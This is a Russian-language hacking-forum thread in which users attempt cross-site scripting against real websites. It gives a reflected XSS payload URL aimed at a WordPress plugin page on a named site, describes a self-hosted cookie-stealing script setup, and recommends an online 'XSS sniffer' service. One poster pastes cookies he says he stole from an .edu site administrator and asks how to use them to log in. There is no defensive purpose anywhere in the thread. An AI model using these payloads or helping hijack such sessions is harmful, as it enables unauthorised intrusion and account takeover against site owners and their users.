Вообщем потихоньку начал вникать в ХСС и столкнулся с такой проблемой.

http://www.gamechangers.com/index.html/wp-content/plugins/simple-flash-video/stats/?action=regenerate&query=&date=201109%22%3E%3CSCRIPT%3Ealert%28/xss/.source%29%3C/SCRIPT%3E

Перейдя по ссылки видим всплывающий алерт с надписью ХСС.

Делаю вывод что ХСС активная уязвимость присутствует.

Далее заливаю к себе на хостинг следующие файлы:

file.js :


PHP:
document.write('');

file.php :


PHP:



И вставляю в уезвимое место следующий код:

В результате в файл куки.тхт ничего не записывается. Права на запись на хостинге поставил ..

Подскажите где ошибка ?

file.php

Я сам новичок, но xss у меня получилась , просто использовал online xss sniffer этот : http://hacker-pro.net/sniffer/ , и не нужно было создавать свой сайт , и писать снифер , в этом снифере уже все готово и готовые скрипты есть которые надо вставлять. Попробуй может подойдет тебе. Я его использовал для тренировки.

cook=__utma=14119845.609346301.1322517201.13262143 52.1326220450.10; __utmz=14119845.1322517201.1.1.utmcsr=(direct)|utm ccn=(direct)|utmcmd=(none); __unam=74abf65-134438036ee-756c813d-2; __utma=180505699.1874526909.1323982403.1323982403. 1324472558.2; __utmz=180505699.1324472558.2.2.utmcsr=google|utmc cn=(organic)|utmcmd=organic|utmctr=(not provided);


Получил успех сегодняшней ночью спёр куки вроде бы как у админа сайта .edu

Вопрос как теперь их заюзать чтоб зайти под ним ?

Cmexo3aBp said:
Получил успех сегодняшней ночью спёр куки вроде бы как у админа сайта .edu
Вопрос как теперь их заюзать чтоб зайти под ним ?


никак. не вижу здесь сессии.

хотя все возможно